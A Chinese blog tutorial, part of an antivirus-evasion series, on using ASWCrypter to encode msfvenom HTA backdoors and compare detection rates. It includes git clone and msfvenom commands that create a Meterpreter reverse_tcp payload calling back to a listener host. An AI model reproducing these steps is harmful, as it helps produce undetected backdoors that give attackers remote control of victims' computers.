远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

admin 2023年1月8日22:45:41程序逆向评论3 views3124字阅读10分24秒阅读模式

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

本专题文章导航

1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

2.远控免杀专题(2)-msfvenom隐藏的参数:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w

3.远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

4.远控免杀专题(4)-Evasion模块(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

5.远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

6.远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

7.远控免杀专题(7)-Shellter免杀(VT免杀率7/69):https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg

8.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71):https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ

9.远控免杀专题(9)-Avet免杀(VT免杀率14/71):https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA

10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70):https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA

11.远控免杀专题(11)-Avoidz免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg

12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70):https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg

13.远控免杀专题(13)-zirikatu免杀(VT免杀率39/71):https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA

14.远控免杀专题(14)-AVIator免杀(VT免杀率25/69):https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q

15.远控免杀专题(15)-DKMC免杀(VT免杀率8/55):https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg

16.远控免杀专题(16)-Unicorn免杀(VT免杀率29/56):https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw

17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69):https://mp.weixin.qq.com/s/OzO8hv0pTX54ex98k96tjQ

18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19/57):本文

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


免杀能力一览表

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。


一、ASWCrypter介绍

ASWCrypter是2018年开源的免杀工具,原理比较简单,使用msf生成hta代码,然后使用python脚本对hta代码进行一定编码处理,生成新的hta后门文件,从而达到免杀效果。

二、安装ASWCrypter

需要本机安装metasploit和python环境。

ASWCrypter的安装比较简单,先git clone到本地

git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git

进入ASWCrypter目录,执行chmod +x ./ASWCrypter.sh

执行./ASWCrypter.sh即可运行ASWCrypter

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

三、ASWCrypter使用说明

使用时需要注意的只有一点,就是要在linux桌面环境中运行,因为在ASWCrypter.sh脚本中,调用msfvenom生成后门时使用了xterm。

xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"

三、利用ASWCrypter生成后门

执行./ASWCrypter.sh,选择G,第一步也只有这个能选

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

然后输入LHOST和LPORT

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

后门选择payload,我还是选择最常规的reverse_tcp了,文件名就随便输一个了

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

之后提示生成test4.hta成功,后面会提示是否开启msf监听,我这就不需要了,还是在mac上监听端口。

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

不开杀软的时候可正常上线

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

打开杀软,火绒静态和动态都能查杀,360动态+静态都没报警。

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

virustotal.com上查杀率为19/57

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

试了下msfvenom生成的原始的hta文件的查杀率

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

virustotal.com上查杀率为28/56

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

四、ASWCrypter小结

ASWCrypter是使用msfvenom生成基于powershell的hta后门文件,然后进行编码处理,达到一定的免杀效果,不过因为会调用powershell,行为检测还是很容易被检测出来。

五、参考资料

官方Github:https://github.com/abedalqaderswedan1/aswcrypter


原文始发于微信公众号(白帽子):远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日22:45:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57) http://cn-sec.com/archives/868768.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: